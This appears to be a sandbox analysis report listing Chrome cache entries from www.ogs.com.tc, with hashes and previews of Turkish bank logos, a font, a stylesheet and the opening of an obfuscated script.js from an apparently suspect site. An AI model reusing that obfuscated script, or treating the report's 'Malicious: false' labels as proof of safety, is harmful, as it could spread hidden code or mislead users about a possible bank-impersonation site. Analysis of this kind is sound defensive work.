File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:20:05], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	20736
Entropy (8bit):	7.207645802514661
Encrypted:	false
SSDEEP:	384:8UVb/iZjUVynSIFV8ZImDkUinAj5B3YWUp32XjW+ke4g:8UN/yUYHOjpiLWUp2XjWXg
MD5:	7E0925A6F6A401C7E8721B9836FC721F
SHA1:	9A0B48E0BD35CCC96C5391B2A30E8260098D7DF7
SHA-256:	CA3770BB64EF72AB2C7D2E1B28639FE9145970310EEDEF1657CB2B81BB3AA4C5
SHA-512:	09C0B4EE63589B8E5907DF1AF95DE667754532F491F786B6F7FC56E71204748D295FA48ABF262A6EA93E0EB8E6F05ED9666984F3330393E9AEAF2BBB9D8D893D
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/anadolu.jpg
Preview:	.....aExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:20:05........................................................................."............(.....................2...........'.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.%.3:.P..W...a..c:...1...~e..}?S....g..S....}m...1..S.6..S}.[[..5.Wew:.................Z.k..

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:27 19:59:58], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	22502
Entropy (8bit):	7.2894603929109865
Encrypted:	false
SSDEEP:	384:v9/ioaLnh1bF8ICY2MkvRkiMbF4/EMnTMY7LTat:v9/SLDGICY2rvkhObr7K
MD5:	AC0CD030D45D9E6E66C084BDE8E550BC
SHA1:	DDCD46644E2F43B14A8D399106F697631A138B2C
SHA-256:	42AC0A069FB6314753F1FDD80C94DAEEB7E784FBC34661CA692C7885390A86B9
SHA-512:	0926E006155988284696401B05F217E961474F125D560E654E6687B2D2CC48FB5306992143EB94D5836FE495FBA0EB07FAE1375652DAE028F240173C9B886C29
Malicious:	false
Reputation:	low
Preview:	.....SExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:27 19:59:58........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$....I.7.}.no...R.&.....3.J]$.IJI$.R.I$...I%)$.IO...T.I%)$.IJ\...[u..........2\....'...................E...........T.......-.....n...

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	4990
Entropy (8bit):	7.944457042989119
Encrypted:	false
SSDEEP:	96:0idZaenJJihOgLDEegvH0vDp0iF1+oHgBrqfgaOFZVSe7+:dnaeJAH2HmD32oABrWgaOF
MD5:	FD5E77DC351059471EEBC68959B970AC
SHA1:	A6E147F8E19EC340715A8180F9DC0A3171C1D159
SHA-256:	D3F148ED9EDFB70EA4138F1D06B50AD305DA5FCE6F8C4155642C84793DADACC2
SHA-512:	D74550EA1FD4D0EE73DDA1D21294D2C06D23417ED2DB7871C29D6B0E27A56A36DC34901DDAA2A7DACD4DECB94A937DF49D236B815B58F7AE38ACC874DEC0A5B8
Malicious:	false
Reputation:	low
Preview:	RIFFv...WEBPVP8 j...p`.......>I$.F".!."...P..en.\|...->..K.....?.}...?......S...z...............w.O....._...z............>.?.[=.........................{..9.-.....o...w.O.?.?._.....?..........N..~R...O.......^J..}....7.w...?..5....P/.?..w.......D.E......./...x..8....o.~4./........e.............O.?..\|..-...7.[.o...s?.?..[2(..w......w......w......w......w.....>......>....i..>...?5.......\.........".d=vO...CI.../k...Y.[..3.xy._..Gtah.......m...p.x...uBZ................A.#.i\b...+-.....S.~...k=W..ZF..@...;..q......'...7+a.]H}...d .....8.p..=.[BX..w.6h.@.E..R. ...V.w..~......-.7.d)..O./.,K.2er3{6J.`..5c.:..k..X.l.!.....j.h(..h:.....:...4(..c.H......J.^p.......Q._.....5a{\...7.[& .o[.=../.."As6..~}.].qg~}.].eFW.".K...,....,....,....,....,....,....,..x........ ..4.o........"._.@`.)...Y..v.+#np&......>.T..d...u..3]...s%gv.d..\|=(u7.D/...D.d.@.-.e....2.}..1c.g".3j:h1..V...N._...9i .+7.{..}-...T....=~F.!2.v.J..t...L...#...:.A7^..X.h..d...E.......

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	5260
Entropy (8bit):	7.952632516709832
Encrypted:	false
SSDEEP:	96:f2l3QIpOaVksRO11Nhf/VwjCX9S2Ml8nWas3SWiy2p0itRx+67ndykjq3Wd4OFoX:Ol3QqVk8CNl/ajCIOtE0OMRx+6jdyixi
MD5:	810A4DE086E544A749CF1B43416178EE
SHA1:	A3102B2BB04886A9665207A1C70068D31F5BDA71
SHA-256:	1D2F039FDBEA8658D2D94F561BC21B0431EFAC371ADDDC47D81BB95B6B8BC4BD
SHA-512:	A6F5AFAE46D00702072FA68C69D2E67D09DAA0442AA0326474BB9AE4EA4CC17EBDCE66E1B6B10E2A18CE5B445E86A0550740F3B368A38308EF84C19DF86641E0
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/ptt.jpg
Preview:	RIFF....WEBPVP8 x...0_.......>I$.E..!.y.p(....p.U.W..J..c.....m..U.]./...........m..........?..~..-...g._.....?..0...s=@.<............r....?.\|..G...o.-......./._\.._.....................l.~..v.O._..e.}....~e.!.O..._....%...K..P............g..=..O...5...U...u..>.....z.}[......._...z.{ .V.PST.va...f.ec..h....(.....(....K.9`;...MZ{...P.......@.....(....+s...M........,..._...j.Z.~.:..ks..,..(......=......M..CtB.v.j...8...]. Be....._.j.j.9...5.m.U......k..e^ .t..F5.)..)~u.i.qh.,.u._.H. .h..)..W.J.M.U'.....SV.R..PS@...m..g.#..'.....F9.a..c<...].(.....Tp.Ta..Ix.)-.:...]Fk}."..C-AMXQK.>?.V.".../.Z)..#8.....T.c.(..n..E.......q.L..xSV.R..PR..U.IB4.:l....I....@.O.;.Ej....:..u.Mc..s.d.d.T....R~u.)..)~u..d...@8..>..Z......Z......Z......Z......Z......Z...........~..K-.^3...Z,D`..{S.+C.$.H....<.m.5...p.:q...A......G...C.........w..OY.{2t..z...U.....$..L......lU..7.... ...U.Se...g@e..-g....~x+<.y...Fh.<d..EZ...b..h....L+S8SU...u.s...T......{jT..p...^.

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
Category:	downloaded
Size (bytes):	48236
Entropy (8bit):	7.994912604882335
Encrypted:	true
SSDEEP:	768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
MD5:	015C126A3520C9A8F6A27979D0266E96
SHA1:	2ACF956561D44434A6D84204670CF849D3215D5F
SHA-256:	3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
SHA-512:	02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
Preview:	wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...\|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2.........C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:34:34], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	24936
Entropy (8bit):	7.391242814683689
Encrypted:	false
SSDEEP:	384:2bFO/iaEbFonMCUVzxO7NrKC85mpXXlxpJfVmqXkw9x8B:CFO/mFogxOJrFXxmeks8B
MD5:	2C60AD4276905C8109BB3981C24BB068
SHA1:	FB8C7C8F07557FF9776D9A95CB50A946A3D326BB
SHA-256:	497B1CE30CDF438891FC6F8DC9250206822ACC3E0F3D81D88599C6E6DC177795
SHA-512:	115BDDD2136E119C112D94560B83F24C84A49909F2172A40C7E75FE82F8A952B7B20ABFEC924BB4126EE3499B26865760AA33291302D236BE7D0B4A30B7CE003
Malicious:	false
Reputation:	low
Preview:	.....ZExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:34:34........................................................................."............(.....................2........... .......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$......j]..........k.B.r_m;.G.~.....z...%=.K....0:..O..e...m6_.k.h..c.m.j.k..z.U..Y.......__....

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with CRLF, CR line terminators
Category:	downloaded
Size (bytes):	149508
Entropy (8bit):	4.885874065110497
Encrypted:	false
SSDEEP:	768:QYHQn2GNJe/26vJf1UqpxQ9pxfdp8a/XX5XFOGXAH/ko:QYHQreuoXQ93fd6ffko
MD5:	86C9289DC8A13C80F14CE626D5774002
SHA1:	F2FC238DF4D4AF5C1469046DE573AD6BF32D3B5A
SHA-256:	91DF9CADDE6F62D90F4D002BF15BEB40C67FF55938B829956044B4524CDA0773
SHA-512:	6C629D9D658FE1850917C8B8A946376641EDC16C466192EB1495B9E1DD09B142AD83612506148B3FD9EDFA96429620839D5692315D4B788D7B72CAB7A8F1ECCF
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/css/style.css
Preview:	@import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');..@import url('https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100;200;300;400;500;600;700;800;900&display=swap');....* {.. -webkit-font-smoothing: antialiased;.. -moz-osx-font-smoothing: grayscale;.. text-rendering: optimizeLegibility;.. text-shadow: rgba(0, 0, 0, .01) 0 0 1px..}....input::-webkit-outer-spin-button,..input::-webkit-inner-spin-button {.. -webkit-appearance: none;.. margin: 0;..}....input[type=number] {.. -moz-appearance: textfield;.. -webkit-appearance: textfield;.. appearance: textfield;..}....body#ROOT {.. width: 100%..}....select:focus,..input:focus,..button:focus,..textarea:focus {.. outline: 0;..}....a,..button {.. cursor: pointer;..}....body#ROOT:after,..body#ROOT:before {.. content: "";.. display: table..}....body#ROOT:after {.. clear: both..}.....st

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	4990
Entropy (8bit):	7.944457042989119
Encrypted:	false
SSDEEP:	96:0idZaenJJihOgLDEegvH0vDp0iF1+oHgBrqfgaOFZVSe7+:dnaeJAH2HmD32oABrWgaOF
MD5:	FD5E77DC351059471EEBC68959B970AC
SHA1:	A6E147F8E19EC340715A8180F9DC0A3171C1D159
SHA-256:	D3F148ED9EDFB70EA4138F1D06B50AD305DA5FCE6F8C4155642C84793DADACC2
SHA-512:	D74550EA1FD4D0EE73DDA1D21294D2C06D23417ED2DB7871C29D6B0E27A56A36DC34901DDAA2A7DACD4DECB94A937DF49D236B815B58F7AE38ACC874DEC0A5B8
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/isbank.jpg
Preview:	RIFFv...WEBPVP8 j...p`.......>I$.F".!."...P..en.\|...->..K.....?.}...?......S...z...............w.O....._...z............>.?.[=.........................{..9.-.....o...w.O.?.?._.....?..........N..~R...O.......^J..}....7.w...?..5....P/.?..w.......D.E......./...x..8....o.~4./........e.............O.?..\|..-...7.[.o...s?.?..[2(..w......w......w......w......w.....>......>....i..>...?5.......\.........".d=vO...CI.../k...Y.[..3.xy._..Gtah.......m...p.x...uBZ................A.#.i\b...+-.....S.~...k=W..ZF..@...;..q......'...7+a.]H}...d .....8.p..=.[BX..w.6h.@.E..R. ...V.w..~......-.7.d)..O./.,K.2er3{6J.`..5c.:..k..X.l.!.....j.h(..h:.....:...4(..c.H......J.^p.......Q._.....5a{\...7.[& .o[.=../.."As6..~}.].qg~}.].eFW.".K...,....,....,....,....,....,....,..x........ ..4.o........"._.@`.)...Y..v.+#np&......>.T..d...u..3]...s%gv.d..\|=(u7.D/...D.d.@.-.e....2.}..1c.g".3j:h1..V...N._...9i .+7.{..}-...T....=~F.!2.v.J..t...L...#...:.A7^..X.h..d...E.......

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 01:56:02], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	33055
Entropy (8bit):	7.604025581526417
Encrypted:	false
SSDEEP:	768:VMns/70MnsMerq/Sf9nTKl8sHM7JE3jtOAVe24HEd+:OnMTnsMer7VnTuHM7JajKR
MD5:	6B6D6494A2D5FE6292641588AF2FF231
SHA1:	D4D82A589A1E71A4C917B0AFC0267BAC3C672480
SHA-256:	C521F96B7435290FD70825A2D5E45A10DC3789FEFD0D98851F72330C1D6F7A11
SHA-512:	31E4C7B87A5D90EF6A419B6A56A2BDE528E1C9368C713F1FB87A16333FF77C021BF1874B5BB74939175D46454810452582081ADB0FD5A11D6BA8844F4C5714E8
Malicious:	false
Reputation:	low
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 01:56:02........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJIgY.....].C..o-u..Q.rT..7........Y...C.=....f..7?.d.?.7........Y...K.s}]...,o.u..$8..}...o.S...N.J..T.....&....n..'...Y..p7...(..1=..I$.B.I$...I

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	5260
Entropy (8bit):	7.952632516709832
Encrypted:	false
SSDEEP:	96:f2l3QIpOaVksRO11Nhf/VwjCX9S2Ml8nWas3SWiy2p0itRx+67ndykjq3Wd4OFoX:Ol3QqVk8CNl/ajCIOtE0OMRx+6jdyixi
MD5:	810A4DE086E544A749CF1B43416178EE
SHA1:	A3102B2BB04886A9665207A1C70068D31F5BDA71
SHA-256:	1D2F039FDBEA8658D2D94F561BC21B0431EFAC371ADDDC47D81BB95B6B8BC4BD
SHA-512:	A6F5AFAE46D00702072FA68C69D2E67D09DAA0442AA0326474BB9AE4EA4CC17EBDCE66E1B6B10E2A18CE5B445E86A0550740F3B368A38308EF84C19DF86641E0
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 x...0_.......>I$.E..!.y.p(....p.U.W..J..c.....m..U.]./...........m..........?..~..-...g._.....?..0...s=@.<............r....?.\|..G...o.-......./._\.._.....................l.~..v.O._..e.}....~e.!.O..._....%...K..P............g..=..O...5...U...u..>.....z.}[......._...z.{ .V.PST.va...f.ec..h....(.....(....K.9`;...MZ{...P.......@.....(....+s...M........,..._...j.Z.~.:..ks..,..(......=......M..CtB.v.j...8...]. Be....._.j.j.9...5.m.U......k..e^ .t..F5.)..)~u.i.qh.,.u._.H. .h..)..W.J.M.U'.....SV.R..PS@...m..g.#..'.....F9.a..c<...].(.....Tp.Ta..Ix.)-.:...]Fk}."..C-AMXQK.>?.V.".../.Z)..#8.....T.c.(..n..E.......q.L..xSV.R..PR..U.IB4.:l....I....@.O.;.Ej....:..u.Mc..s.d.d.T....R~u.)..)~u..d...@8..>..Z......Z......Z......Z......Z......Z...........~..K-.^3...Z,D`..{S.+C.$.H....<.m.5...p.:q...A......G...C.........w..OY.{2t..z...U.....$..L......lU..7.... ...U.Se...g@e..-g....~x+<.y...Fh.<d..EZ...b..h....L+S8SU...u.s...T......{jT..p...^.

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:20:05], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	20736
Entropy (8bit):	7.207645802514661
Encrypted:	false
SSDEEP:	384:8UVb/iZjUVynSIFV8ZImDkUinAj5B3YWUp32XjW+ke4g:8UN/yUYHOjpiLWUp2XjWXg
MD5:	7E0925A6F6A401C7E8721B9836FC721F
SHA1:	9A0B48E0BD35CCC96C5391B2A30E8260098D7DF7
SHA-256:	CA3770BB64EF72AB2C7D2E1B28639FE9145970310EEDEF1657CB2B81BB3AA4C5
SHA-512:	09C0B4EE63589B8E5907DF1AF95DE667754532F491F786B6F7FC56E71204748D295FA48ABF262A6EA93E0EB8E6F05ED9666984F3330393E9AEAF2BBB9D8D893D
Malicious:	false
Reputation:	low
Preview:	.....aExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:20:05........................................................................."............(.....................2...........'.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.%.3:.P..W...a..c:...1...~e..}?S....g..S....}m...1..S.6..S}.[[..5.Wew:.................Z.k..

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	3052
Entropy (8bit):	7.910068716360241
Encrypted:	false
SSDEEP:	48:fDiNIVkaNj3FlfwBxQKrNrj0gfjE3kXCyRsdjsnsRgi8DP1wyLZME1FIam+z:mNIVNNj3XfwBxrN0Y2kS8slsnKgiG6E/
MD5:	5EFD7FB621B6E039549923F7E1FD4A17
SHA1:	043DFE10E2D4D90A72E5624166EC961BE7B20B3A
SHA-256:	6DF70210D474FD90F14D08BB9DBC66C0411FB1F85F503DCD62916FEC271A2C5A
SHA-512:	D2A0115E24BCB77962ADAA408BBA4D846CA77C6CF391AF9F34E1888B31FEC9E91FA04EBF3BBA256A7963B05C10A6AEB9049484319D6C74757155C0BB20EC411D
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/akbank.jpg
Preview:	RIFF....WEBPVP8 .....G...*....>I$.F".!!$q.P..en.v...... ;.(.J........E.......j\|......?0.......O...7.../p......j.......c.........?...}.z..:....;..........._.?...?...........X..../.....c.......Br.......P.-.&.....s.pK...^..(...../R..D....BJ"y.....%.<.....P...qypB.(IDO8..!z.$.'.^\..J.Q../-.P.i..e..%.....z..V..-...8#p:.h..M..........H...0........rz...2...n.pB.(D..Q..M...L.Bd.T..f..T...c.......n..BO...-._..A....H!.-.....2....Ow..../8y...)w....[.....B.(....p.-w.xS.CA?YH.M\m-...]%W"...^...h..".\|.r...,3 ....X.k'.s.!z.$.V-...(...../R..D....BJ"y.....%.<.....P...qypB.(IDO8..!z.$.'.^\.......X................m.{.e...U....<.:@.{.e...>...0J.qT..J..m..U$..E...O..4.@7=Z......;T..\.mI...\|V.\-KjS2Z..d..d.P.S..."Z...3M......"......h..X0..t.}.....RD.....y...x..Bp.hCN0........o...d............H..'?.en..\|O\T.md..#..P_.<.(H..85.?.9.}E.n..N+m...l...Q..l.......A..a.6........Rh.;.O.....X.[....e.@.....z..S\|...,.B....>P.Gp.......(.^.al...B?.F+......o.0P..>.j....V.]G.F.'.1...

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	4904
Entropy (8bit):	7.94930581705637
Encrypted:	false
SSDEEP:	96:M6opqi3R4YgHM9ddzxgiaqkElcwTUwFySe2v8iwAohflvcrKfn9z1k:M6oBaP+zxgiaqkEgw/eo8tvPqKfn9Rk
MD5:	A82F67A8BCFFF4EA7793BB3FCC00CB4D
SHA1:	DECC78E3F9341338EB0AB9757735E2338A5DE451
SHA-256:	871657EF72C4641D784288FBCCBC14775B72A07437C69E2E29D7A2AE0BED9F73
SHA-512:	10C19D9A4BFCB1033F1AE5DEBF41821597A10FA83896C73C1CABF421F441150D9A3037B1E2E1E0F8F0AB77515346201A17ED89652918F63EEE86E89387E6EA18
Malicious:	false
Reputation:	low
Preview:	RIFF ...WEBPVP8 .....a.......>I$.F".!.!.Y.P..en.uK..~...RN....{.O.]........v......=.<K.......~......w...`?...:G.....6...S...............=........Y...7.7.o....._..P........................?..T......N.3..._.?e.,...!....c..........?.c...}..._._X...E}....y.?.O...~!?J.m..........................>...?......w.7...#..C...L..!.}...h...:....}...h...:....}...h...:....}...h...:.....y....L.A....2. ..%0P`.y...\|@..I..Eq.........T.'.c...B.iA......D..F......\|.9....[..+9.). ...>u....`l..U..$~c...".c./szwR........-..>.&......pH....W.cR....1..."U..66}...9.1?.Ss.M..w.%G..ZUq..6.....1.E....Ku.t...%..S.m...s.5...;.:...`d....s......`....C.eK...........-.......qDe. D..%?:...&3.G.+....C...W..........r..A..u....2}...!C-%...p....kk6.q.S..\|;.uc..X.GV>...uc..X.GV>...uc..X.GV>...uc..X.GV>...t.....%........DS...1b..>X.......\|.)..<.\j....`t.D....L..#..0.e..v..L!......xC..$.B.W...c..#.:....X...'e.)B.X`...I.....]\'Q..Y:R.R.t.Xe.....c...U.A..A.2.(4...}.^.V..h541./.........

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65524), with no line terminators
Category:	downloaded
Size (bytes):	165489
Entropy (8bit):	4.895905755805124
Encrypted:	false
SSDEEP:	3072:XJrHFOPPvJUnk/wWHdAyMpQ82U/ddzqHu/u6olnPJsEWx:5HFOPP2nk4WHdAyMpQ82U/dcHu1olnPM
MD5:	5AA332B5891E11EC6C0CEEF84E83BA21
SHA1:	6199B80DE81251C61234C9532C4FD6F55A44E148
SHA-256:	9EA5DE183CB4E7BBFD327D5D5283553F323E60E149BD3EBEE310E81C5EDA500E
SHA-512:	07F3603FE16F93E726E18C7B52A06C05D95C2B63C1DCF9B9D865A1317DC3872DE97EAEF5F6F99EDEB6CBBD4A24409C5E73C44B9B8977F9AD3E8805D16B0182BE
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/js/script.js
Preview:	function _0x29df51(_0x4c6bf7,_0x38d0cc,_0x554698,_0x35fecc,_0x451cec){return _0x289a(_0x38d0cc-0x78,_0x35fecc);}(function(_0x4b75be,_0xdaf1f){function _0x290509(_0x5f37cb,_0x24d899,_0x2a7be0,_0xbd5a04,_0x56171a){return _0x289a(_0x2a7be0- -0x287,_0xbd5a04);}var _0x5d7e12=_0x4b75be();function _0x177763(_0x4fecaa,_0x4521df,_0x39ddff,_0x4fd340,_0x215640){return _0x289a(_0x4fecaa- -0x178,_0x39ddff);}function _0x268e1f(_0x1a0aca,_0x50daa1,_0x511ca7,_0xfa7961,_0x5b6738){return _0x289a(_0x50daa1-0x3c0,_0x1a0aca);}function _0x3dbc17(_0xa1b0b3,_0x36025e,_0x3e7102,_0x5b2be4,_0x94654f){return _0x289a(_0x36025e-0x52,_0x3e7102);}function _0x3f5229(_0x1bdd95,_0x45f948,_0x4a8863,_0x518c9d,_0x4e3394){return _0x289a(_0x45f948- -0x1f9,_0x4a8863);}while(!![]){try{var _0x46e0bb=parseInt(_0x3dbc17(0x444,0x31b,0x283,0x190,0x1d1))/(0xc6a+-0x1-0x1f39+-0x2ba2)(parseInt(_0x3dbc17(0x28f,0x227,0x31d,0x1da,0x329))/(0x430+-0xaca+-0x9-0xbc))+parseInt(_0x177763(0xa1,0x14,0xae,0x1be,0x180))/(-0x32e+-0x6aa0x2+-0x108

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	4528
Entropy (8bit):	7.936942161113379
Encrypted:	false
SSDEEP:	96:eM0ww3WpqYkXJnPUlwdFKoN8FSz2gDi/8:eM0l3Wp7oJPgwdFdNeSzZDj
MD5:	7D37026130C2A0B269BD4F9C165FAD7F
SHA1:	F53514C0D1A2F644CB6DB4FFADF0167FEC4413BF
SHA-256:	008B64ADB48FE137B0210B3187450B8804FB291D5283E794E2EAE52E05D61720
SHA-512:	C8FA453082068ED27DFEFA878997B30D8420FD053C5F3616A36DC6B2824493D403662F92EFD64248E1F10F58225E41EEE60A420C6C6D40E3814DC800F16E55AA
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 ....0^.......>I$.E..!...T(....p.T...y.U..~!.s....,.o..k>..@y.~..u...........7..P....z.=.?h=3.d~..l.......d....C.?..t~..[..LP~;.....f.#>..c.../.....w................o.>...{..(.g.c.w.o./........g.3....\.........+.............../.k.s..P....w.....w.....w.....w.....w.....w.....w.....w..e..5.r...;..r...;}.bo.>S........~.....F..p.I...;AT....+.M"Gz..uG..7W.n3..T.G1.....2..D.G..PI\.,..](./.!..z.T..D.....3.@....obLH\o....9..l.]b...#..e.}.S....2K..?c..........=ey.U.E.!._7u.....9D..eZ..'.:..\.6iE.^..m?T.......,..D..2=....%V.K....~...5.`....52..D<l...#..2...d.N..8.n.F....\..%..=.'.O~5.D..!.....R.......U.....N....I...QjCV..`..._.1..IOb.yg~....F..Q.:..wJ....%....Uy..0..w...!...@wf....;..r...;..r...;..r...;..r...;..r...;..r...;p...............$.e....q..5O..M.nf.Ap."..8....l...7.....1....c..[...A4FD,.+.f..(....Of.Oj...&Y....5....{.^...)...i.<.F...r.A....y.